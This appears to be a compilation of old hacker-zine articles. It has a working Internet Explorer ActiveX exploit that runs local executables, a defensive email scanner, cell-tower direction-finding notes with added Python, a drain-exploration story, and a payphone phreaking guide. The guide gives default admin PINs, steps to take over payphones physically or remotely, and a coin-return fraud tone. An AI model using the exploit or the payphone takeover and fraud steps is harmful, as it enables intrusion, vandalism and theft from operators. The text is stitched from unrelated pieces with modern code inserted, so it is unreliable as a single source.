You can get any local .exe to execute in IE by referring to it in the
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything
but all zeros.  Here is a code snippet, courtesy of Dildog, which will
execute calc.exe if it is in c:\windows\system32\

<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\system32\calc.exe'></OBJECT>
</BODY></HTML>

The other problem is the fact that .exe files can get downloaded to your
local system without you being able to cancel the operation. 
I tested the malware exploit on win98 with medium security settings 
(the default) and it worked as promised.

But what was far worse was it worked at the high security setting also.  
A warning message came up saying "Due to your security settings you cannot
download that file." You press OK and the file is downloaded anyway. 
Then it executes when used as the codebase of an ActiveX control.

The demo exploit won't work in W2K because the temp directory where the
.exe is downloaded to is  "c:\documents and
settings\'username'\local settings\temp".  If it is possible to get the
username through JavaScript and another ActiveX control it could possibly
be made to work there also.



I hope you enjoyed this file and find it useful. 
It's early in the morning/late at night so I'm kinda burnt.

The Non-Existent Crew rocks! We're proud to be Canadian eh!

-- PsychoSpy
   PsychoSpy@softhome.net
   ICQ#: 5057653
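
Added example (not from the original article): a Python check a mail gateway
could run, which decodes each MIME part (so the =3D quoted-printable escapes
seen above are resolved first) and flags the markers the article describes.
The rule names, the extension list and the sample message are constructed
assumptions for this example.

```python
import re
from email import message_from_string

# Constructed sample message carrying the markers described in the article.
SAMPLE = r'''From: sender@example.invalid
To: rcpt@example.invalid
Subject: constructed test message
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html><head>
<meta http-equiv=3D"refresh" content=3D"5;
url=3Dmhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">
</head>
<frameset rows=3D"10%,*">
<frame src=3D"mars.exe">
<frame src=3D"lunar.mhtml">
</frameset></html>

--b1
Content-Type: application/octet-stream; name="Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="Microsoft TechNet Security.url"

[InternetShortcut]
URL=C:\WINDOWS\TEMP\refresh.bat

--b1--
'''

# Assumption: file types worth flagging when a frame loads them from a mail.
RISKY_EXT = (".exe", ".bat", ".com", ".scr", ".pif", ".cmd", ".mht", ".mhtml")
# A reference is "local" if it names file:, a drive letter path or a UNC path.
LOCAL_RE = re.compile(r'^(?:mhtml:)?(?:file:|[a-z]:[\\/]|\\\\)', re.I)
FRAME_RE = re.compile(r'<i?frame\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
META_RE = re.compile(
    r'<meta\b[^>]*http-equiv\s*=\s*["\']?refresh[^>]*?url\s*=\s*([^"\'>\s]+)',
    re.I)
OBJECT_RE = re.compile(r'<object\b[^>]*\bcodebase\s*=\s*["\']?([^"\'>]+)', re.I)
SHORTCUT_RE = re.compile(r'^(?:BASEURL|URL)\s*=\s*(\S.*?)\s*$', re.I | re.M)


def is_local(ref):
    return bool(LOCAL_RE.match(ref.strip()))


def scan_html(html):
    """Return (rule, value) pairs for one decoded HTML body."""
    findings = []
    for src in FRAME_RE.findall(html):
        # A frame whose source is an executable or archive, not a page.
        if src.lower().endswith(RISKY_EXT) or is_local(src):
            findings.append(("frame-loads-file", src))
    for url in META_RE.findall(html):
        # A timed refresh that jumps from mail content to a local file.
        if is_local(url):
            findings.append(("refresh-to-local-file", url))
    for base in OBJECT_RE.findall(html):
        # An OBJECT tag whose CODEBASE is a path on the reader's own disk.
        if is_local(base):
            findings.append(("object-local-codebase", base))
    return findings


def scan_message(raw):
    """Walk every leaf MIME part, decode it, and apply the rules."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.is_multipart():
            continue
        body = (part.get_payload(decode=True) or b"").decode("latin-1")
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html":
            findings += scan_html(body)
        elif name.endswith(".url"):
            # An attached Internet shortcut that points at a local file.
            for target in SHORTCUT_RE.findall(body):
                if is_local(target):
                    findings.append(("shortcut-to-local-file", target))
    return findings


if __name__ == "__main__":
    for rule, value in scan_message(SAMPLE):
        print(f"{rule:24} {value}")
```

Matching on the decoded part rather than the raw text matters here: a pattern
written for src="..." never fires on the src=3D"..." form that travels on
the wire.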

---

           RADIO DIRECTION FINDING WITH PCS/GSM MOBILE TERMINALS
                       Bunny Hunting the Cell Towers

                   by wargames <wargames.edmc@net.nospam>
                                      
 --== RDF Theory ==--

"Blah blah blah Ginger!  Blah blah. Blah blah blah blah! Blah Ginger!"[1]  If
you want something about RDF theory, I suppose I can cook something together,
but I'm sure you'd prefer just to get some useful HowTo info.
   
 --== RDF on ClearNET CDMA (Sony CMB1207) ==--

Once in field service mode, the display  shows the cell number (PN Offset) and
signal strength.  No usable signal and the weakest usable signal are displayed
as 0x80 and the strongest normally  encountered signal will  be shown as 0xFF.
Beyond the normal range, the meter will wrap around to the range 0x00 to 0x7F.
Power levels in this  range indicate the  base station  is less than 150m away
from the handset.

Clearnet's cell sites are usually configured with 3 cells per tower. Cells are
separated by a PseudoNoise Offset  (cell-specific  CDMA channel  code) of 168,
and are nominally 120 degrees apart.  Repeaters will most likely look like odd
cells. Circling the tower,  2 of the offsets will be related, while one is way
out to lunch and has a very narrow (and far-reaching) corridor. Geckobeach [2]
reports that  Clearnet orients  their towers with  the middle PN offset facing
south  -  There is evidence  that in  Edmonton (in the  southeast and downtown
areas at least) the middle offset faces east.  This may  not hold  true in all
places - verify the orientation of the PN  offsets with the angle of the cells
and a compass.
   
This pattern of  fixing PN offset  direction makes  cell hunting quite simple.
Look for a transition of 'L=H-336' or 'H=L+336'. The L->H transition indicates
that, for a northbound observer, the cell is located on a west vector +/-5deg.
Cells aren't perfect radiators - they do spill over somewhat.  In a worst-case
scenario, at the intersection of 3 towers' coverage, "thrashing", (fast random
or circular handoffs) may occur as 6 antennae pick up a handset in their zone.
Oscillation  between  2 PN  offsets is a sure  sign  of having  found  a  cell
boundary. Follow it home and tag it. H-L transitions for a southbound observer
obviously  indicate  a  cell to  the east.  Repeater behaviour  is not clearly
defined.
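
Added example (not from the original article): the Sony procedure above written
out in Python, covering the wrapping signal meter, the 168-step sector spacing
and the oscillation that marks a cell boundary. The readings in SAMPLE_LOG are
constructed, and the function names and heading strings are assumptions; the
bearing table holds only the two cases the article states.

```python
SECTOR_STEP = 168  # PN offset spacing between a tower's sectors, per the article

# Only the two observer/transition cases given in the article.
BEARING = {("L->H", "north"): "west", ("H->L", "south"): "east"}

# Constructed drive log: (PN offset, raw meter byte) in the order observed.
SAMPLE_LOG = [
    (12, 0x90), (12, 0xA8), (348, 0xB0), (12, 0xB4),
    (348, 0xC1), (348, 0xF0), (348, 0x05), (180, 0xE0),
]


def unwrap_meter(raw):
    """Map the meter byte onto a monotonic 0..255 scale.

    0x80 is the weakest reading, 0xFF the strongest normal one, and
    0x00..0x7F is the wrapped range seen very close to the base station.
    """
    if not 0 <= raw <= 0xFF:
        raise ValueError("meter reading must be one byte")
    return (raw + 0x80) & 0xFF


def within_150m(raw):
    """The article places wrapped readings at under 150 m from the tower."""
    return raw < 0x80


def classify_handoff(old_pn, new_pn):
    """Name a PN change using the L / L+168 / L+336 sector layout."""
    delta = new_pn - old_pn
    if delta == 2 * SECTOR_STEP:
        return "L->H"
    if delta == -2 * SECTOR_STEP:
        return "H->L"
    if abs(delta) == SECTOR_STEP:
        return "adjacent-sector"
    return "other-tower"


def find_boundaries(log, heading, min_flips=3):
    """Report pairs of PN offsets the handset flipped between repeatedly."""
    found, pair, flips, first = [], None, 0, None

    def flush():
        if pair is not None and flips >= min_flips:
            found.append({"pns": sorted(pair), "flips": flips, "first": first,
                          "bearing": BEARING.get((first, heading))})

    prev = log[0][0]
    for pn, _meter in log[1:]:
        if pn == prev:
            continue
        if {prev, pn} == pair:
            flips += 1          # still bouncing between the same two cells
        else:
            flush()             # a different pair starts a new candidate
            pair, flips, first = {prev, pn}, 1, classify_handoff(prev, pn)
        prev = pn
    flush()
    return found


def strongest(log):
    """Return the reading with the highest unwrapped signal level."""
    return max(log, key=lambda reading: unwrap_meter(reading[1]))


if __name__ == "__main__":
    print(find_boundaries(SAMPLE_LOG, "north"))
    pn, raw = strongest(SAMPLE_LOG)
    print(pn, hex(raw), "under 150 m" if within_150m(raw) else "further out")
```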
   
 --== RDF on MicroCell GSM (N5190 v5.81 ) ==--

In their infinite cleverness, Nokia's engineers put the required data displays
on different screens.  This is mostly a minor inconvenience,  since the 5190's
test mode shows far more information than  the Qualcomm  digital engine in the
Sony handset.  The information required to trace cells is located on screens 3
and 11,  with some useful tidbits  found on  4 and  1.  Screen 3  shows signal
strength and control  channel numbers  for the  currently serving  cell, along
with its 2 nearest  neighbours.  Screen 11  gives  CGI  (Cell Global Identity)
information.  Screen 4 continues the nearest neighbour display, allowing us to
predict which cells it is possible for us to move into, and the timing advance
parameter on screen 1 offers clues to the distance from the base station.

      screen        1               3               4              11
      L1       533 -72 xxx    533 27-72 27    516  6-93  6    CC:302 NC37?
      L2       0  1 x xxxx    523 15-84 15    513  2-96  2     LAC:  3100
      L3        27      27    536 13-86 13    515 -1100 -1     CH :   533
      L4            CCCH           N  N          N  N  N       CID: 10063

When interpreted as MCC:MNC:LAC:CID,  the format of the CGI data resembles, in
no small way,  the numbering conventions used for ethernet addresses.  In fact
the CGI number is globally unique to that antenna. The first two fields are the
Country Code and Network Code.  These are an assigned prefix, and the latter 2
fields are essentially a manufacturer / operator serial number.  Just as there
can be many ethernet cards whose MAC addresses end in 'C0:FF:EE', there can be
many  cells  whose LAC/CID pair  is 1264/8430.  The ethernet  analogy  remains
appropriate when considering the base station as a router. A computer can (and
often does) have multiple network adaptors, so does a base station - each cell
can be considered to be a NIC.

The  5190's  data  display  is  unique  in  that it displays, for each control
channel,  2 numbers  RxL and  PLCC  (Receive Level and  Path Loss Compensation
Coefficient)  such that  PLCC-RxL=99.  The list of neighbourly cells is sorted
by signal strength,  thus making  a relatively easy job  of  predicting  which
cell  will  be the next service cell.  Screen 3  may be  the most  useful  for
finding  the tower,  but screen 11 is where the actual tower ID is.  Do not be
fooled  by  the control channel ID  -  it is only a channel.  It can  and will
change with network load.  That said, control channel ID is the fastest way to
find a cell.  Whenever the control  channel changes,  compare the  old and new
values to see if  they indicate a new cell  or merely a new channel.  If a new
cell seems  more probable,  verify  this  on screen 11.  Apparently  MicroCell
orients their cells in the shape of a capital 'Y', numbered 1-3 clockwise from
the southeast sector.  (I'll have to verify that -  Edmonton seems to be weird
for cell configs.)
   
Screens 4  and 5  are more neighbours.  Likely,  you won't  need to  use their
information,  except maybe to  bootstrap your search. GSM  is a time-sensitive
protocol.  To compensate for distance  from the tower,  the network can direct
the phone to transmit sooner,  rather than later.  This is shown in the timing
advance parameter,   found on screen 1, line 3,  field 2.  It varies between 0
("is that a  tower in your pocket or are you just happy to see me?")  up to 63
(nearly a long-distance call).  For what it's worth,  the maximum  radius of a
GSM cell  is 35km,  due to this  timing sensitivity.  Thus,  1 unit  of timing
advance is  approximately equal  to being 550m from  the tower.  What with the
size of cells  in metro areas,  it's doubtful  that this  value should ever go
above 12. Nonetheless, it may serve as a useful way to check your work.
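
The screen 3 / screen 11 / timing advance bookkeeping described above, as an added example in Python (not part of the original article): it parses readouts in the layout of the table, decides whether a control channel change is a new cell or merely a new channel, and converts timing advance to distance at the article's 550m per unit. The second and third captures in SAMPLE are constructed, and every function name is an assumption of this example.

```python
import re
from typing import NamedTuple

TA_UNIT_M = 550   # metres per timing-advance unit (the article's approximation)
TA_MAX = 63       # upper end of the timing-advance range given in the article


class CGI(NamedTuple):
    """Cell Global Identity, in the article's MCC:MNC:LAC:CID order."""
    mcc: int
    mnc: int
    lac: int
    cid: int

    def __str__(self):
        return f"{self.mcc}:{self.mnc}:{self.lac}:{self.cid}"


# Screen 11 layout as printed in the article: CC/NC, LAC, CH, CID on four lines.
_SCREEN11 = re.compile(
    r"CC:\s*(?P<mcc>\d+)\s+NC:?\s*(?P<mnc>\d+).*?LAC:\s*(?P<lac>\d+).*?"
    r"CH\s*:\s*(?P<ch>\d+).*?CID:\s*(?P<cid>\d+)", re.S)
# Screen 3 line: channel, then PLCC and RxL run together, e.g. "533 27-72 27".
_SCREEN3 = re.compile(r"^\s*(\d+)\s+(-?\d+)(-\d+)\s+-?\d+\s*$")


def parse_screen11(text):
    """Return (CGI, control_channel) from one screen 11 capture."""
    m = _SCREEN11.search(text)
    if m is None:
        raise ValueError("not a screen 11 capture")
    f = {k: int(v) for k, v in m.groupdict().items()}
    return CGI(f["mcc"], f["mnc"], f["lac"], f["cid"]), f["ch"]


def parse_screen3_line(line):
    """Return (channel, plcc, rxl) from one line of screen 3."""
    m = _SCREEN3.match(line)
    if m is None:
        raise ValueError(f"unrecognised screen 3 line: {line!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def likely_next_channel(screen3_lines):
    """Line 1 is the serving cell; the strongest neighbour is the likely next one."""
    neighbours = [parse_screen3_line(line) for line in screen3_lines[1:]]
    return max(neighbours, key=lambda n: n[2])[0]


def ta_to_distance_m(ta):
    """Approximate distance from the base station for a timing-advance value."""
    if not 0 <= ta <= TA_MAX:
        raise ValueError(f"timing advance out of range: {ta}")
    return ta * TA_UNIT_M


def classify(prev, cur):
    """Compare two (CGI, channel) fixes. Only a CGI change means a new cell."""
    if prev is None:
        return "first-fix"
    if cur[0] != prev[0]:
        return "new-cell"
    if cur[1] != prev[1]:
        return "new-channel"
    return "unchanged"


def track(captures):
    """captures: list of (screen11_text, timing_advance) in travel order."""
    events, prev = [], None
    for text, ta in captures:
        cur = parse_screen11(text)
        events.append((classify(prev, cur), str(cur[0]), cur[1],
                       ta_to_distance_m(ta)))
        prev = cur
    return events


# First capture uses the values from the article's table; the other two and
# all timing-advance values are constructed for this example.
SAMPLE = [
    ("CC:302 NC37?\n LAC:  3100\n CH :   533\n CID: 10063", 2),
    ("CC:302 NC37?\n LAC:  3100\n CH :   523\n CID: 10063", 2),  # channel moved
    ("CC:302 NC37?\n LAC:  3100\n CH :   516\n CID: 10061", 1),  # CID changed
]
SCREEN3 = ["533 27-72 27", "523 15-84 15", "536 13-86 13"]  # article's table

if __name__ == "__main__":
    for row in track(SAMPLE):
        print(row)
    print("likely next channel:", likely_next_channel(SCREEN3))
```
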

 --== RDF in action ==--

[image]  Mapping begins by  defining a "Base Point".  This is a point on a map 
tagged with a vector approximating the direction of arrival of the signal.  If
this vector is copied and rotated 90 degrees  and 180  degrees, projections of
the resultant  vectors  will cross vectors  describing the  boundaries  of the
cell.  Should an  extension move the  cell into a zone served by  another base
station,  reverse the sense of the vector and reproject.  Connecting  the zone
crossings and  extrapolating will establish a corridor in which it may be said
with a high degree of  certainty that  a  base  station  is located.  Position
within  the corridor may  be  established by way of signal strength and PN/CGI
indicators.  All that  remains is  to  travel  the corridor until  the cell is
within visual range.
   
 --== RDF Approximation/Optimization ==--

[image]  1) The following method optimizes search complexity at the expense of
time and resource requirements.

By plotting signal  strengths at regular intervals (street intersections,  for
example)  over  a  large  enough  area, perhaps  10 km^2  and  connecting  the
appropriate points (ie.  by average signal  strength or by cell ID) it becomes
possible to narrow cell  locations to a  small area.  The inefficiency of this
method lies in  the requirement  for a large  amount of  travel  and  that the
plotted points (if not chosen correctly)  may only  converge very slowly if at
all. This method is recommended  for  mapping microcells in congested "antenna
jungles," and as a bootstrap for other methods.
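
Method 1 above, done numerically instead of on paper (an added example in Python, not from the original article): readings taken at intersections are grouped by cell ID and reduced to a signal-strength-weighted centroid, a technique swapped in here for connecting the plotted points by hand. The survey rows, the local grid coordinates in metres and the `min_samples` cut-off are constructed for illustration.

```python
from collections import defaultdict


def dbm_to_mw(dbm):
    """Convert a receive level in dBm to linear milliwatts for weighting."""
    return 10 ** (dbm / 10.0)


def estimate_cells(survey, min_samples=3):
    """Estimate one position per cell ID from a grid survey.

    survey: iterable of (x_m, y_m, cid, rxl_dbm) rows.
    Returns {cid: (x_m, y_m, sample_count)}. Cells with fewer than
    min_samples readings are left out: too few points do not converge.
    """
    by_cid = defaultdict(list)
    for x, y, cid, rxl in survey:
        by_cid[cid].append((x, y, dbm_to_mw(rxl)))

    estimates = {}
    for cid, points in by_cid.items():
        if len(points) < min_samples:
            continue
        total = sum(w for _, _, w in points)
        # Strong readings dominate, pulling the estimate toward the antenna.
        est_x = sum(x * w for x, _, w in points) / total
        est_y = sum(y * w for _, y, w in points) / total
        estimates[cid] = (est_x, est_y, len(points))
    return estimates


# Constructed survey: readings at intersections 200 m apart (x, y, CID, RxL dBm).
SURVEY = [
    (0,   0,   10063, -90),
    (200, 0,   10063, -80),
    (400, 0,   10063, -70),
    (400, 200, 10063, -80),
    (400, 400, 10063, -90),
    (0,   400, 10061, -85),   # only two readings for this cell:
    (0,   200, 10061, -95),   # reported as "not enough data" by omission
]

if __name__ == "__main__":
    for cid, (x, y, n) in estimate_cells(SURVEY).items():
        print(f"CID {cid}: about ({x:.0f} m, {y:.0f} m) from {n} readings")
```
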

 --== ==--
   
[image]  2) The following  method optimizes  search complexity and time at the
expense of accuracy and possibly resource requirements.

Once a cell boundary is located, a flattened spiral search takes place. Simply
travel along the cell line,  reversing direction  after F(n)  units of travel,
where F(n) is  the nth  Fibonacci number[3],  n is the number of the turn, and
one travel unit is 200m.  Since F(8)=13,  the 8th pass along the line  will be
1.6km,  more  than long enough  to  establish the true direction of  the cell.
Disadvantages include the fact that the resultant location may be difficult to
access,  improbable or  incorrect,  further compounded  by the difficulties of
staying on the cell line.  That accounts for most of the wasted travel,  since
the Fibonacci search is naturally efficient.  This method  is  recommended for
open  but  complicated areas  like refineries where it  may not be  obvious in
which direction the cell lies, due to the "cleverness" of some site engineer.

Other useful search techniques will be posted as they are described.
   
 --== RDF References ==--

[1] Far Side. You know the one - "What we say, what dogs hear."
[2] http://www.geckobeach.com/cellular/
[3] F(i+1)=F(i)+F(i-1). F(0)=0, F(1)=1. F(x) -> 0, 1, 1, 2, 3, 5, 8, 13, ...
[image] Images accompanying this paper (and the latest html version) can be
        found at http://www.edmc.net/~wargames/df-paper.html

---




	Monday July 3rd 2000 - Our First Exploration in a Downtown Drain
   ______________________________________________________________________

        Magma and I decided it was time to go and explore. Being new at
      this, we weren't exactly sure where to start. Since exploring a
      building is rather risky to begin with, we thought a drain is a
     relatively safe place for a couple of new explorers to check out.
         After a couple weeks, Magma spotted a nice drain we could
                             possibly explore.

        So, we had the drain figured out, we next had to plan up how to
     enter and what to bring on this little expedition. Magma brought a
   maglight, and, I brought along another maglight, and the camera around
    my neck. Since this was a drain, we had to wait for a day when there
    was no precipitation so water level of the drain was fairly shallow
    for us to walk in. Also, for safety sake, being downtown, the safest
   time to not be spotted in this activity would be to go at night. Magma
   added the note that we travel the drain at around 11pm. The reason for
   this is that teenagers walking around that time of night is not nearly
              as suspicious as teenagers downtown at like 3am.  

     It is now July 3rd, and Magma and I decided this night is as good
    as any to begin exploring. Boy, were we in for a surprise. Magma had
   driven us to a restaurant a few blocks off the drain, and we walked to
   the drain from there. To avoid arousing suspicion, we changed into our
    draining gear (rubber boots, and shorts) at a parking garage with a
      bathroom across the street from the drain. Once at the drain, we
   slipped into the channel, and began walking into the tunnel. At first
    glimpse we expected the drain to just get smaller, and close into a
     wall or something. Instead, the tunnel took us along a few turns,
     never seeming to end. As we walked, we could only see but 30 or 40
   feet ahead from our flashlights and after that, pitch black. Along our
   travels, we came across an orifice [image] door. I quickly got closer,
     and peered inside which forms a new tunnel to lead us elsewhere. I
      went inside, and was quickly stopped by large pipes blocking my
      travels. After climbing below and above them, I decided I wasn't
   getting anywhere, and returned to the opening where Magma was waiting
                                  for me.

           As we walked through the cool water in the tunnel, to our
    surprise, we were constantly being hit by fish that were swimming in 
      this water. At times, Magma and I were being tripped up by these
   fish, that were hard to avoid, considering the number of them. Another
     pest on our trip were the number of spiderwebs we walked through.
   Nevertheless, we were still enjoying ourselves and continued along the
     tunnel. About 20 minutes through the drain, we came along another
      rather large tunnel. Both Magma and I detoured through it, only
   coming to a stop by a large steel grate. Having only flashlights, and
    a camera, we had no choice but to turn around, and continue through
       the main drain. We came across a few more larger drains, but
   decided to continue on through the main drain. After about 45 minutes,
   we came closer to the sound of rushing water, and then a dim light. As
    we travelled closer, the light grew brighter, and the rush of water
    more intense, and louder. At this point, we did not want to take the
      chance of being seen, so we turned off the maglights and walked
                towards the light in front of us. To our
     disappointment, we came to the end of tonight's journey. What lay
    ahead was the light of streetlights. A large steel grate blocked us
       from exiting the tunnel into the water pump stations. Already
    satisfied with what we had found and explored, we decided it was best
        for us to return back through the main drain, and back home.

      The trip back was very quick. Since we were now walking with the
   current, our speed was significantly faster, and also, now that we were
   familiar with the area, we needn't be so slow, and cautious of what's
       ahead. We made it back out of the drain, climbed up out of the
    channel, and changed back into normal clothes at the parking garage.
   We then got back into Magma's car, and returned home after a great trip
            of what shall be one of many more drains to explore.    



Reference: (with image) http://internettrash.com/users/mtghu/drain01.htm

---

<S3mt3x> Well would you look at all the happy people....
* cyb0rg_asm/#haxordogs looks
* theclone grins happy-like
<S3mt3x> Do you see 'em cyb0rg_asm are they still shining?
<cyb0rg_asm> yes, shiny.       





    'The Comprehensive Guide to Paytel Canada payphones'


Written by: The Clone
On Friday July 14, 2000



    __________
  ./_CONTENTS_\. 
  `            `

.; Disclaimer

.; PayTel Canada offices 

.; Protel Model Phones

.; Intellicall Model Phones

.; Resources 

.; Conclusion

.; Contact

.; Shouts
_,_




   Disclaimer --

Within the pages of this document is information pertaining to the
technological ins and outs of a huge chunk of the payphone market in Canada. 

I am in no way responsible for any damage someone or somebody causes by reading
this document. If you want to break something and risk a fine or prison time,
by all means leave me the hell out of it. In other words, if I in some way AM
contributing to that slight increase in Canadian youth crime, I don't take 
responsibility for it. So please, use this information to learn and grow and 
not to piss off your phone company, the police department, or national defense.

_-_


	                'PayTel Canada offices'


  Several months ago, in my document titled 'The Complete Guide to the 
Elcotel Payphone' I listed off every Corporation that currently has an
account with Elcotel; this included specific account information in 
alphabetical order. From what I assume, that information was deemed useful 
by my readers so for that I've taken a similar approach with this section.

For now, here is a list of every PayTel office in Canada in order from west to 
north - just a good resource for Canadian phreakers who may be interested in 
this company.

__

Paytel's national head office is located in Surrey, British Columbia, 

with the following branch offices in: 

Alberta (Calgary), Ontario (Toronto, Markham), Quebec (Mirabel), 
New Brunswick (Moncton) and Nova Scotia (Dartmouth).


   Western Canada (Head Office)
       2428 King George Hwy
        Surrey, BC V4P 1H5
       Tel: (604) 542-2010
       Fax: (604) 542-2011
    Toll-free: 1-877-542-2010


	  Ontario Region
       6 Adelaide Street East
	     Suite 500    
	Toronto, ON M5C 1H6
       Tel: (416) 504-7400
       Fax: (416) 504-7211
  Customer Service: 1-800-265-2953
       info@paytelcanada.com

		
          Quebec Region
       17,000, rue Charles
           bureau 100
        Mirabel, PQ J7J 1X9
       Tel: (405) 433-0001
       Fax: (405) 433-1303
     Toll-free: 1-877-433-3553


	 Eastern Region
      201 Brownlow Avenue 
            Unit 57
     Dartmouth, NS B3B 1W2
       Tel: (902) 468-1716
       Fax: (902) 468-1717
    Toll-free: 1-877-575-7555

_-_


		   'Protel Model Phones'


Protel, Inc. of Lakeland, Florida is North America's leading manufacturer
of smart public payphones. In 1984 Protel introduced the first line-powered
smart payphone in the USA. Protel were one of the first key-players in the 
development of the first Customer Owned Customer Operated Telephones (COCOT) 
in the early 1990's, and have strived to bring quality yet cost effective 
phones to millions of people around the globe.

Protel develops several payphones, though only having slight differences
between them, which are unique and interesting to mess around with for 
a couple of obvious reasons; interaction with the phones' diagnostic -
statistical information is possible by using a series of secret codes,
and physical/remote security is fairly weak. This is just the type of
thing any telephone enthusiast loves to read.


Note: 

I haven't personally found an abundant amount of these payphones within
Edmonton in comparison to the Intellicall model phones, but keep in mind, 
the telecommunications industry is an ever-changing one so who knows what
to expect in the next six months or so. Keep your eyes peeled and lemme
know if you find any Protel Model payphones in your area.



PayTel Canada's Protel Phone
----------------------------

This is one of the few widely distributed Protel phones in Canada:

http://home.edmc.net/~theclone/protel.jpg

	
Payphones and Accessories
-------------------------

http://www.protelinc.com/PROTELInt/payphone/Fpayph.htm


Protel Locations
----------------

    Restaurants - Truck Stops - Schools - Service Stations - Churches -
    Airports - Bowling Alleys - Night Clubs - Bingo Parlors - Resorts -
   Low-income Housing - Convenience Stores - Apartments - Bars - Lounges
                             - Hotels - Motels 

Features
--------

- When dialing a call on a Protel phone, the phone slowly dials each digit
  while it waits for you to finish dialing or finish paying. You'll be able
  to hear this in the background, but it is often quiet so open your damn ears!

- Leaving a Protel receiver off the hook for too long will cause the phone
  to produce an interesting beeping sound.

- Credit Card slots; some of these phones DO have credit card slots which 
  accept many major credit cards (e.g. Visa, Mastercard, etc.).

- Internal Alarms; can be disabled by entering *# and the correct two to four
  digit pin code, most likely in default mode and easily bruteforceable.

- Ringers; Protel model phones will most often ring when called. 
  After five rings a modem carrier will pick up which is sometimes
  followed by an automated voice that reads off how much money is in the
  phone including the date/time.


Special Features
----------------

- A particularly special feature about the Protel model payphones are the 
  unique Protel-only *# options that allow any phreaker to learn about the
  phones' internal information simply by entering a few codes.
  Here are the *#6X codes I'm aware of at this present time:
 
     ` *#61 should give you ANI information

     ` *#62 will ID the software version the phone is utilizing

     ` *#65 sometimes discloses the phone company's HQ modem number 
       - in Canada the modem carrier number would belong to PayTel Canada.
       
     ` *#68 disables the phone altogether


! Tip: by hand-scanning other *# codes (e.g. *#0X, *#1X, *#2X, etc.) 
       you may find more neat options like the ones noted above.


Remote Administration Software
------------------------------


               ftp://208.49.251.4/XnetV151.exe - ""




Security Issues
---------------

'Physical Administration' 

To my knowledge there are two ways to gain physical administrative powers
on a Protel model payphone, the first way is somewhat easier. 

Here's what you do;

` Enter *# and then the correct four digit admin PIN code which are most likely
  defaults such as: *#1234, *#5555, *#9999, and so on. Once you enter the
  correct PIN code you will have total access to all menus, rate tables,
  and will have the ability to alter restrictions on what phone numbers
  can be dialed.

` The second way is quite a bit more difficult but is successful nonetheless.
  After entering the correct two to four digit *# alarm code, and opening
  the phone with the proper keys, you will notice a 'setup' button on the
  printed circuit board.

Press the button and immediately you'll be prompted for the correct PIN code.

` Enter *#000000 (6 digits) - at this point you will have total access to
  all menus, rate tables, including the ability to alter restrictions on
  what phone numbers can be dialed.   



'Remote Administration'

Remote Administration of the Protel phone can be both enjoyable and 
profitable, if done correctly. In this section, I'll be explaining step by
step on how to successfully take over a payphone or many payphones by
using just a computer with a modem and the proper software.

The first thing you'll need in order to successfully take over a Protel 
payphone remotely is the particular payphone's phone number. This can be
accomplished by either writing down the phone number listed on the phone,
or by entering *#61 with the receiver off the hook.

Secondly, you're going to need the right payphone administration software.
Remember; some software which might work for administering one payphone may
not necessarily work for another. The reason for this is that some
software just isn't compatible with the payphones' chip, making it impossible 
to even connect to the phone correctly. 

Another reason may be that the software you're using doesn't allow you to 
enter the necessary number of digits that would be required of you when
prompted for the PIN code. In this case, you'll need software that allows
you to enter a 6-8 digit payphone admin PIN.

The PIN code; because of the fact that most payphone administration PIN codes 
(by default) are a series of numbers with only one number and 6-8 digits,
and if we remember that the internal physical administration PIN for the
Protel is *#000000, I would say that the default PIN for all Protel phones
is likely an easy guess.


'Audio File coin return exploit'


Many of the Protel payphones throughout eastern Canada and parts of the
United States which are owned and operated by Bell (called BOCUT's) are
vulnerable to a particularly interesting form of phone fraud. 
This vulnerability will allow anyone on one of these phones to make a
local call and then get their money spit back into the coin return.

Now as some of you may already know, as a service provided to ensure customers 
aren't being ripped off when they insert that 25/35¢ for a call, phone 
companies have what they call a "coin return policy". 

This policy states that if a customer inserts his/her money for the call
but is unable to complete the call due to technical problems on the part of 
the CO, then the operator must empty out the appropriate change. Nowadays
with the advent of new telecom based technologies, all an operator would
be required to do is play a specific frequency into the receiver to 
subsequently cause the phone to empty.

What I'm getting to is this; if anyone on a regular quality land-line was to 
be called by someone on a Protel model BOCUT, and then the person on the
land-line was to play the coin-return frequency, they could quite possibly
automate what any operator has the power to do. This little exploit is
known as the 'Green Box', but alt.phreaking's 'Cyber Thief' coined this the
'Protel-Box' for the obvious reason that it only works on Protel model phones.

DIY, baby:

==>									<==
The frequency in '.WAV' format: http://home.edmc.net/~theclone/freecall.wav
==>									<==


	      Canadian Distributors
	      ---------------------

            C. G. Industries Limited
                30 Shields Court
               Markham, Ont. L3R8V2
               Phone: 905-475-5093
                Fax: 905-475-5389
               http://www.cgil.com  

       International Connectors & Cable, Inc. (ICC)
                16918 Edwards Rd.
            Cerritos, CA 90703-2400
               Phone: 562-926-0734
                Fax: 562-926-5290       
            Toll Free: 1-800-333-7776
           http://www.icc-payphone.com  

               Palco Telecom, Inc.
               7825 Flint Road S.E.
             Calgary, Alberta T2H 1G3
                  (800) 661-1886
                  (403) 255-4481
             Fax: (403) 259-0101
              http://www.palcotel.com   

             Pay Phone Technologies
            80D Centurian Drive Unit 8
                Markham, ON L3R 8C1
           	    905-947-8216
               Fax: 905-947-8209
             Toll Free: 1-877-488-0041              
              http://www.foc-ppt.com     

-`-
		  
                  'Intellicall Model Phones'


     `` Using advanced technology and the experience of over
 12 years in the industry, Intellicall produces two payphone models
  that may both be customized with a variety of options to meet the
   demands of your locations. The UltraTel payphone is the economical 
  workhorse of the industry for those installations that use AC power. 
The AstraTel payphone is the proven answer where line power is preferred. 
Both are highly robust systems that deliver the long term reliability 
           required in any successful payphone network. ''




Paytel Canada's Intellicall Phone
---------------------------------

Paytel Canada distributes this model of payphone by Intellicall called
the AstraTel 2:

http://home.edmc.net/~theclone/astraltel2.jpg


Intellicall: 'AstraTel & Ultratel' Audio Samples
---------------------------------------------------

http://www.payphone-directory.org/sounds/wav/web/intvoice.wav
